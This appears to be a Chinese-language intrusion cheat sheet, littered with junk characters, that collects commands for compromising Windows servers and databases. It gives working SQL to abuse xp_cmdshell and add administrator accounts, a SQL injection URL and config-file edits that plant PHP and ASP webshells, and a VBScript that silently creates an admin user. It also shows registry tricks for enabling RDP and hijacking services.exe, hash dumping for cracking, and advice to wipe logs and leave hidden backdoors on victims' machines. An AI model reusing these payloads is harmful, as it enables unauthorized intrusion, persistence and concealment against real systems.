- A& N0 |( j* A* B# F1.net user administrator /passwordreq:no V6 @5 O' E. m6 a; z3 n0 E
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了9 Y, h( _9 a3 b! j* J+ v) O. w
2.比较巧妙的建克隆号的步骤/ C7 e# g% e$ V! o1 u/ s
先建一个user的用户0 }9 Z% G! D# T; D2 B
然后导出注册表。然后在计算机管理里删掉1 R4 F2 t3 m- w8 ]! k4 B+ Z# D0 e
在导入,在添加为管理员组! A* U) B5 f! I. l
3.查radmin密码1 ~7 v. I) n. A& ~& c
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg. J, n* F, w D. B7 N
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 Z, a9 b9 U) M" [9 G$ |建立一个"services.exe"的项9 {4 d8 e. A+ e* f* t
再在其下面建立(字符串值)9 k2 h3 {, q, G8 X% G( D
键值为mu ma的全路径
: ]% y" i" v# a$ }5.runas /user:guest cmd1 _0 v k" {- Y8 a# `
测试用户权限!
, F5 G# S5 b, q4 R! l# _, y6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?1 ?$ o6 T ^$ }1 S9 }5 e8 u n" ^
7.入侵后漏洞修补、痕迹清理,后门置放:
/ Y1 n1 k5 c" @: S基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
+ F) T8 H$ L) t9 l8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c. x' q) Q' k/ n% {) Q
6 j+ D" \3 d" B1 J, j
for example. U; v' I. A8 I" ?6 w( M r
; Q( d5 _, o: M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'& p/ y9 J. c5 [
! ?5 f% h: ^: Z7 @6 l6 A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'7 b }) Y+ v9 E5 [
, \5 i8 _8 W1 l* }/ M; ?& J9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
" f: Q; D, ]0 t" H$ [如果要启用的话就必须把他加到高级用户模式0 G+ y% P3 V/ }- x2 M" Q
可以直接在注入点那里直接注入7 g V) N8 ]) x5 w) F" A& S( m; G0 Z+ r
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--" W6 @: U, o0 j9 b
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
/ y8 B6 M5 d8 l% `+ w或者( Z$ U0 i/ J% h* `& x( x* O) p
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
c6 {) B+ `9 X+ j2 D" ]! [. w1 `来恢复cmdshell。9 R8 d/ m8 v$ o. W3 `! L
* d' N/ p+ a0 L7 c分析器# Q$ O" x) R/ l% U
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--% }5 f: Y" m1 {7 n* Y/ X3 j& s
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
R; I9 p! h* M6 h5 @10.xp_cmdshell新的恢复办法
: i) x- i) a# j3 y7 t( @xp_cmdshell新的恢复办法1 u$ Z( Z1 Q l$ G
扩展储存过程被删除以后可以有很简单的办法恢复:9 S0 b3 O m8 v7 F8 \# e2 q
删除
' h# e" b7 O& Z2 i. n4 J tdrop procedure sp_addextendedproc6 G5 B! J& y: r
drop procedure sp_oacreate
% u; P# _# @6 Q7 H" |- e1 Oexec sp_dropextendedproc 'xp_cmdshell': J1 w5 ~# R' K% _
2 ^+ Q! B `( w% ]
恢复) U3 c1 E# f% V+ }2 I
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
( M. Y( o- N! j6 Q( @+ Y1 _dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
3 ]" |( n/ Q: w5 w5 f' y4 b4 K
2 q; a* W6 C- n1 C4 c y这样可以直接恢复,不用去管sp_addextendedproc是不是存在7 g( w( x% p. A3 O% V
+ C% `. m1 n: w' O$ V-----------------------------
1 M4 }; z1 c; c% I5 V; l
1 J9 x) P p: t0 g$ e删除扩展存储过过程xp_cmdshell的语句:
* v- c" G* k1 ]- x7 dexec sp_dropextendedproc 'xp_cmdshell'* ?' H+ N9 O5 E2 Y; [) `
+ j( |: `+ {) ^$ N! M
恢复cmdshell的sql语句
- x5 g! S7 l- B9 dexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 |1 i% X6 a% f& ^0 s9 D
' a V& ^! P7 S" x; _/ l: |
+ I" R3 h T, w开启cmdshell的sql语句
) i D+ e, j; t9 `4 h
: m. ?( j3 |8 L) vexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'' L! ]+ A7 ^9 S T, O1 d4 m A$ B
( d, R( o% q2 q# e4 y3 x- p
判断存储扩展是否存在5 P, w# g* V) i3 |' W
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell', I; J% p" x% w6 U* v* Z
返回结果为1就ok. Y# [- t; R; g/ e% |- E6 H
+ S9 W( @' N6 d# ^
恢复xp_cmdshell7 P" Z- u& D& G5 [/ x- B7 X
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. V I. v+ Q y4 h8 b& N6 h返回结果为1就ok
8 x" f \; A4 x: _0 d4 M6 V6 }7 A* M3 F; L9 X* `
否则上传xplog7.0.dll: s' D8 ]- i& ?( W8 @7 }4 M4 g
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
' N/ |' ?* X! f+ s! o/ n% ]" P
2 O) x* ]# z* ]/ ]" ~! V堵上cmdshell的sql语句* ^) i6 w4 z% e4 M8 O) J
sp_dropextendedproc "xp_cmdshel* r7 q, K6 p& r b/ v3 P/ `/ y
-------------------------
5 n$ L; V7 S" M" F清除3389的登录记录用一条系统自带的命令:
; n+ v7 l) f) Y2 R( zreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f# A4 S6 n% K4 k# W4 `8 Y5 B$ {# [; g
, @! o6 W. n. t( w n然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
- A" Q, @. g9 K: V7 e在 mysql里查看当前用户的权限4 Y, y* [6 ] j+ D' |3 }! j r
show grants for
. r5 [9 |! T! a% j' ^+ o, X; |: }
$ j$ P& }2 A9 _: B/ j& r以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。1 R" D# Q6 r) }7 ~1 ~
* _% Q' H0 L. S' a) o3 V; T- e7 l4 ~3 a
Create USER 'itpro'@'%' IDENTIFIED BY '123';& H6 R4 ^1 ?2 y' @1 n
7 D( R4 O& [9 ]2 B" JGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
1 `' `7 g# l3 a B: I: [! F, T/ p. L% ^% A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 00 S, z9 e* Z# T; ]% x& s# `
) X5 E* M. j( J' @% W" `7 w I- x. G
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 W* w* c3 _$ y/ N6 h/ Q+ [ ?2 V4 m4 b9 R
搞完事记得删除脚印哟。
/ e$ }* L6 d; v- g. i/ V R2 P
: P* @6 n& Y- WDrop USER 'itpro'@'%';7 v \; C u# v& }6 g
1 |5 g1 s% l/ P# KDrop DATABASE IF EXISTS `itpro` ;
2 x; q6 U( \: h1 F8 A5 {% J* v
' ^9 s: L: p5 Y: t当前用户获取system权限" m# ~+ w5 [3 j1 o. ~
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 A. h4 V+ z6 A0 @
sc start SuperCMD1 N! R- g0 [" K1 b6 ~- A
程序代码- J! M+ r0 ]' {' ]) j
<SCRIPT LANGUAGE="VBScript">, K% K# Z: X, ^" O6 y
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
5 z& ^4 [. W# Q: ^os="WinNT://"&wsnetwork.ComputerName
- q' z$ ~- K1 R1 {7 ]Set ob=GetObject(os)
3 D+ R; X. z9 n$ u! o. Z& ESet oe=GetObject(os&"/Administrators,group")
" T0 T$ v* Z4 u: b' s: F8 eSet od=ob.Create("user","nosec")
$ k$ @8 ?$ e" ^& v$ nod.SetPassword "123456abc!@#"1 \! F1 |5 T3 b2 ]
od.SetInfo7 `$ ?9 u- I1 e) ^$ `, B7 R6 C: l
Set of=GetObject(os&"/nosec",user)
$ }3 F3 d/ L" n* J: x. goe.add os&"/nosec"
8 n/ [# v8 J5 d4 p</Script>
. C7 _5 p5 ~, L/ V$ g5 a6 t0 [<script language=javascript>window.close();</script>0 D$ }" _9 r$ p) Y% w& V
) T1 b2 {+ x& I, R6 s$ E$ Y0 d. d) p) \2 @1 Z7 Y: i
+ v4 B' V! b. U2 `; J0 B9 \' _% }% i. r/ ~1 y R `3 x
突破验证码限制入后台拿shell; s6 s# E; N8 P4 V
程序代码
* k6 H. M1 g* r+ M. u+ i: jREGEDIT4
! F/ @' o' C1 |5 O v0 S[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" {% \- F2 a( Q+ a"BlockXBM"=dword:00000000
' g% X5 X( E, ^
, |* ~7 \0 c* @保存为code.reg,导入注册表,重器IE
! x( |! i4 L3 S& _9 P3 a( y就可以了
) s" S1 S1 b# q6 A, r& m. [' u- punion写马
0 H/ h8 L& C7 |' M- w程序代码/ }% q- }3 q; l) u" w
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) h) U e6 t; M2 ]' m# m
4 ]6 E0 ~2 U1 ]$ P2 b应用在dedecms注射漏洞上,无后台写马
2 ^ G% y8 l) m0 w" M# |. \dedecms后台,无文件管理器,没有outfile权限的时候
) V" f. v5 M7 s% }: e; U7 @8 I在插件管理-病毒扫描里
0 Y* o3 ~! H8 c* H写一句话进include/config_hand.php里& n9 C( m- {6 m" s* H% m" f9 g: }
程序代码
4 r8 A' |4 G$ y% a" Z! d1 {>';?><?php @eval($_POST[cmd]);?>' ]! D; K' m6 b* A! Z5 h
4 S0 ? Y1 U0 ^
7 U; ]* Z- m+ p8 Z s如上格式
* d6 O7 w+ L& {! s l
' T' L# u- K8 | A, B" yoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解6 j8 K: b: E7 f* N) N* u, U8 Z0 o8 \4 M
程序代码# r1 P% I) Y2 \3 X# T1 \ P( t0 J2 k1 C
select username,password from dba_users;
- F$ f- o, f$ a: ^0 b6 k8 p& R7 k* t- ^/ y) @
6 _5 a: K7 n* ?mysql远程连接用户
& H. G! i/ E6 r1 F$ Q8 k/ j程序代码
& z3 _& u% o8 V: M
5 I, |9 [; V% t o8 NCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
1 D. x( b( e: J5 ZGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION- T; q6 v& r' P- D$ I% N: C* g& V' d
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 03 [: |6 U- @1 @* a
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( n" |/ g1 M) j; s! x
: O- C s, U, V3 B0 k4 C+ d- e8 g/ f7 n' T- s8 W( D
' k& }: _7 p& x+ N% p! d8 S' A) Z7 f
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
$ x: w t+ _ i# Y9 {. F: t M
; V! i$ r1 Y0 Y" \3 s$ }1.查询终端端口& i0 U6 T! X, o# g& c
3 x* L4 K! z$ b- M4 y* Axp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber3 F+ n' J( j0 [# c6 p* \. u% `
W' d- ^( i6 G' a: ?通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"8 s$ A* L* L$ N
type tsp.reg
3 A* D% e" M* R4 I" Y: I
; ~ F9 a% |; @2.开启XP&2003终端服务
' U6 s r Y' b( T* j2 N
, H9 y1 R, N, N" y1 z r. Q2 Y' Y k: w$ w2 k5 d. ^
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
; \$ g8 U6 A) T- c- Z- C; k
0 |0 p4 c) g# Z) x- X& ^) y0 L
+ g. r, L% m: _6 Q1 uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f7 t: F2 p: d' p/ J" m% N
2 |: V- F, O# s2 [% v0 v
3.更改终端端口为20008(0x4E28)& O: W; [/ f) l' f! f( j* C
6 c* J; F) _6 t5 H- l' G& y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 V5 m2 {' r* P' ~3 v; D" P
) J; }2 L. L" c& wREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f3 a' {; Z0 X# B: G; d- s2 I( _2 O# m
5 N2 a# U7 V5 C9 ^8 C* k
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
$ @' E& ^5 L+ F
: a0 _0 B' B' g/ ]8 bREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f( A3 r5 M: D6 c
; P, N0 H" `" T' w! ~
$ x* g; ~% A# B' V5.开启Win2000的终端,端口为3389(需重启). k% G, c1 }' l- o; Y
1 U/ p) z7 q, q0 Q
echo Windows Registry Editor Version 5.00 >2000.reg , H+ m5 W, H' P4 b
echo. >>2000.reg6 D$ v* S. N; I. I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 D8 j2 K1 h/ a: Iecho "Enabled"="0" >>2000.reg
5 h4 ?, V$ h0 q/ X1 Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! v9 l& s* \/ {2 M2 Q5 necho "ShutdownWithoutLogon"="0" >>2000.reg + {, }* w% m+ N$ x# b/ X: S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg / l/ U( q- ]4 t8 C
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg & _2 L2 f/ z5 R( C" ~% X) a+ ~- O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg / U& K5 N) K) n4 }" T q
echo "TSEnabled"=dword:00000001 >>2000.reg
* S% e3 L: Q6 c, d) ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg * x1 ^! w0 C: M2 M$ |! V, z( X0 a4 F9 a
echo "Start"=dword:00000002 >>2000.reg
& j7 f! W# j8 ]- t6 f6 d5 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 m7 f9 {" {; D) ?5 v# q* I, v* |+ ?
echo "Start"=dword:00000002 >>2000.reg : y/ W/ _1 ]' o9 _9 n. r# i- l3 v
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
" g, J; ~' {3 H+ L' V* f: Necho "Hotkey"="1" >>2000.reg 9 f% r$ f) a. X+ J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
6 l4 `7 L# x7 G; Decho "ortNumber"=dword:00000D3D >>2000.reg + i( f7 U! I% ]' e" q- Q; n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
% T8 B& c# u; |) e+ @! R9 @* g3 Cecho "ortNumber"=dword:00000D3D >>2000.reg3 [7 V1 c: f( ~( n7 q7 B
d2 C1 Z4 E. b* f
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
5 Q* Q9 |# w; l0 o( _) W" J: I! @3 m4 f F
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf! d. \5 v8 ~$ c' S0 @
(set inf=InstallHinfSection DefaultInstall)( P4 r8 s- A+ Z% ?/ U" i
echo signature=$chicago$ >> restart.inf
9 O- M: W! m$ S secho [defaultinstall] >> restart.inf# ? G9 B4 L1 p k
rundll32 setupapi,%inf% 1 %temp%\restart.inf) c. U: c8 j1 [5 F, i2 d1 i- R
* g/ \9 g6 U0 G+ t) Q
0 I' M: T3 J# G
7.禁用TCP/IP端口筛选 (需重启)
* Y- B1 i( t- W; Z
# Z" G& B6 L8 K3 J4 K- ]REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8 }* h* g% i+ R$ \3 Y
; Y4 n0 P r, P! {6 Z1 i7 |8.终端超出最大连接数时可用下面的命令来连接9 Z3 R. w v y- a. q, b; Q4 X( ^
* E/ M3 S# v0 s
mstsc /v:ip:3389 /console# m& f+ t% d. M1 f
. Q1 H, |5 H1 x; ]' R; A; o3 y
9.调整NTFS分区权限
: H3 c" y, G6 P" K' E% s0 I* B
4 [+ ?- o& @' o2 kcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
- L6 [) o/ F, S6 G# [ C' c
/ Y. y; N6 r& v4 i+ G1 L" h/ ^cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
( v- B k; L6 ]7 i: E- }: a
; U! B: u* b# J0 E, m------------------------------------------------------' P7 E* `4 R3 B& v6 x+ W4 Q+ Z0 k
3389.vbs - @# E3 a* H: Z5 V& b' P O
On Error Resume Next
: ?6 `/ a+ i3 \. A6 tconst HKEY_LOCAL_MACHINE = &H80000002! v# E9 ?: U9 o3 g& ^+ w6 f% t6 ~
strComputer = "."9 s0 B6 c8 z% D# d3 h& R( _
Set StdOut = WScript.StdOut
5 P0 a1 x. ~4 f- P8 @$ o' x9 ?Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_+ I+ q- j, Z2 j! O0 d; |8 M8 k+ E
strComputer & "\root\default:StdRegProv")
8 l5 [/ |+ J, A6 u1 N7 ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ @! s. e1 ]/ q' p0 moreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath- `; X4 ?1 i3 a: c9 Y$ O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( t+ w/ D, v% v, O) L$ Doreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
6 S) m4 N7 }6 j+ u5 JstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& E8 K: i1 ]" Q z6 q7 qstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"5 p1 A% r( e3 C: n/ Q
strValueName = "fDenyTSConnections" r7 e2 O8 E/ S2 D" ^2 O) g( j6 K6 h
dwValue = 0
7 |. u6 H/ w! N& r5 T5 U; @7 aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) P" F3 a1 r5 v) D% G6 u* {
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
) r& X9 F: ?; l: ]$ s/ mstrValueName = "ortNumber") N _0 B {/ E9 N/ c( Z
dwValue = 3389
* s2 m- ?% t0 j" z: @oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) _" e" a! J: _& m9 T% \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% G# ?& l/ y/ j9 d& r
strValueName = "ortNumber"
+ Z K2 Y- {- x* KdwValue = 3389
: c2 }: o, r qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" I* w( F% |+ G# q2 `3 y" p6 B3 N' e/ {Set R = CreateObject("WScript.Shell")
1 _" D& u9 r; \. ~( N, x( Z" J' XR.run("Shutdown.exe -f -r -t 0")
/ k; c0 R8 C- v8 s ~6 z* z; `& S) }& ]
删除awgina.dll的注册表键值7 T# q* q, G+ f; U9 }3 V' d+ R6 v: A
程序代码
' l3 @/ {& C, F& z* M. z+ S0 N( U5 E7 j& @; T% g
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
% a1 n3 Y1 p1 U0 Y2 ~: y
5 j. m9 |8 d. n% K3 U. i
: d" h! Y5 S7 j5 q p5 R3 V: M& s9 [) z% m% R- R8 ]. \) x) |: ]
0 w# d: _: N+ b8 T. p6 G( f程序代码& A0 Q4 u1 W U% l- N
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash9 X) o: N5 n S) u$ a
+ ^1 g5 `- B% q: F8 X$ N设置为1,关闭LM Hash0 a I4 p& I, X. I
% F8 H3 T! @$ I& s/ Z h9 C数据库安全:入侵Oracle数据库常用操作命令
: H) G6 X4 }* w3 ~: O# X+ H最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。7 Y- ]! m, R- p3 w; ~& ^( F2 y
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。; P% _% b! q7 s2 O3 i
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
B/ |5 N- K8 N I* i3、SQL>connect / as sysdba ;(as sysoper)或1 I/ j4 N6 [9 ], E, m7 b. [% M
connect internal/oracle AS SYSDBA ;(scott/tiger)1 _% x- u; n- K" d
conn sys/change_on_install as sysdba;7 i, X$ v8 d B8 s5 H9 N p B
4、SQL>startup; 启动数据库实例 |7 x7 i& a+ k1 B. c, S9 O, y B
5、查看当前的所有数据库: select * from v$database;
+ `( `5 V, _5 X6 x; S# iselect name from v$database;( N# ^8 g) p; H# F8 |1 p9 b/ S( J
6、desc v$databases; 查看数据库结构字段
# A" K* |- U' t6 {5 z! v7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
4 ~1 ?9 r( O% sSQL>select * from V_$PWFILE_USERS;; o8 [" ^: O" I, a% P. W4 a
Show user;查看当前数据库连接用户
" J" Z/ u' u! E# l8、进入test数据库:database test;, |- `" b. ]8 A$ d, I
9、查看所有的数据库实例:select * from v$instance;" p- w( ^8 k; U9 u
如:ora9i
" k& ?" B) @! E7 R6 u10、查看当前库的所有数据表:9 F& H9 U0 Z0 V- T$ E9 Y; d- H
SQL> select TABLE_NAME from all_tables;
' T F( A0 k( P# {; g5 }0 }select * from all_tables;( |, w$ C2 Y( F8 v( c9 A
SQL> select table_name from all_tables where table_name like '%u%';
@) `/ c2 J. w7 _3 j' V9 B7 NTABLE_NAME% y# H' M% G0 ^7 \7 E% B
------------------------------( y, K$ G- B& q9 F7 E$ `
_default_auditing_options_
d$ G! e, m, G! |- }2 M; u11、查看表结构:desc all_tables;$ C' E; y, x0 @( B8 k9 f
12、显示CQI.T_BBS_XUSER的所有字段结构:! Y2 L+ C2 w& |9 d' Z
desc CQI.T_BBS_XUSER;! k% P4 q/ U) l1 n R$ ]
13、获得CQI.T_BBS_XUSER表中的记录:! q' J) S3 c5 H7 S7 d/ `: u& u
select * from CQI.T_BBS_XUSER;
; w: M- X7 R2 o# W. a |14、增加数据库用户:(test11/test)# J, k9 r- B+ Q U2 v. P
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
& |4 [+ o/ i2 \9 |/ p15、用户授权:
, n' { m6 S' J, ~% F* i: {grant connect,resource,dba to test11;
8 p7 X. m6 ~; R0 Rgrant sysdba to test11;
* ^$ ?8 W" c: k% ?2 G$ qcommit;
2 B9 d+ S! A6 |! a F16、更改数据库用户的密码:(将sys与system的密码改为test.); v" I( i* _( q7 A; [- r
alter user sys indentified by test;
4 {# s) t" D; i7 q/ Lalter user system indentified by test;7 N& c' r& W7 ^" J& Y y
! {8 S1 ^7 |( p0 ?5 Q
applicationContext-util.xml# m$ `) D. u& f: O7 P! v# G
applicationContext.xml
* Z M8 M1 Q$ q/ ]% I' [struts-config.xml1 J0 |. `" Z0 G) o9 _3 e
web.xml
/ I, Z* ]+ x* r7 Userver.xml
% z9 O( Y' @) Q" @8 A6 Q Utomcat-users.xml
! f& F! O1 ^+ `hibernate.cfg.xml7 w4 z5 C: t8 h( G' r
database_pool_config.xml/ Q0 ]* i5 \# t) T
1 b! A( ~$ J: j, g& J5 [- f, q8 o' u6 ?1 Y
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置% F! _8 U$ Z |4 g; I/ Q
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
+ |1 I+ ~7 @" G3 H( C; |4 S\WEB-INF\struts-config.xml 文件目录结构4 C6 J% t6 P7 b% }* T, g; F, ^1 E9 y
- R, `* g0 C: _0 O9 {; t: cspring.properties 里边包含hibernate.cfg.xml的名称: e8 X( N6 d4 x3 D- q
_/ Y2 _2 j& F5 L) I
* R1 K3 M7 S8 Y/ n
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
/ O9 X( f2 w# U- Z1 N9 J0 p( Y$ b3 C
如果都找不到 那就看看class文件吧。。- | s# Y; y/ w- B
5 D! N- B/ k! v7 s" G9 D8 q
测试1:/ \! Y# e' c! p D7 S$ N
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1& T5 {. e% ?9 [5 k {, D5 N
: {# h2 r# z& J4 ^* A# Q' p
测试2:& y' C7 K& W; Y t& ]
+ H# b* b1 i$ n( p/ M
create table dirs(paths varchar(100),paths1 varchar(100), id int)4 ^ D* m+ I1 y5 B
3 z6 B: E+ r. x7 T6 U$ d2 a: ddelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
~# t. i; K' h. t; s
: ~. y1 I- H3 O% l& b0 K: |SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 y7 B/ T2 M8 _ i
! c% }& b' j$ N: D7 ^# h! z
查看虚拟机中的共享文件:/ Q0 |: C \& h8 j/ [3 J
在虚拟机中的cmd中执行( C0 P, d" j+ M, j5 \6 N
\\.host\Shared Folders
9 h z4 ~+ Q4 P" T* j4 \
4 l, W7 q- D( m9 g; B# ucmdshell下找终端的技巧; _. N @( G5 S; Y
找终端: # r; M# Y9 d3 J
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! / m% P# S- c8 t/ v* \
而终端所对应的服务名为:TermService : h! o3 O; f5 p. J9 u
第二步:用netstat -ano命令,列出所有端口对应的PID值!
9 I% d( l9 ]5 Q) g7 e9 U 找到PID值所对应的端口: w) y7 I" H5 E- g- k, F3 J
; S* ^* a ~5 ?/ g% Q1 w
查询sql server 2005中的密码hash4 Q/ n2 d+ ?0 I3 l$ i7 m4 s/ q' E
SELECT password_hash FROM sys.sql_logins where name='sa'
' r. }5 C. N8 P. ^' X$ KSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a- t/ @! C" n6 \1 n
access中导出shell
$ y+ K' Y$ f5 O( H9 |8 L& u2 r" ], S% M# ?4 E$ o3 H. {
中文版本操作系统中针对mysql添加用户完整代码:1 x5 o- d3 y& z3 u* U3 T T6 U
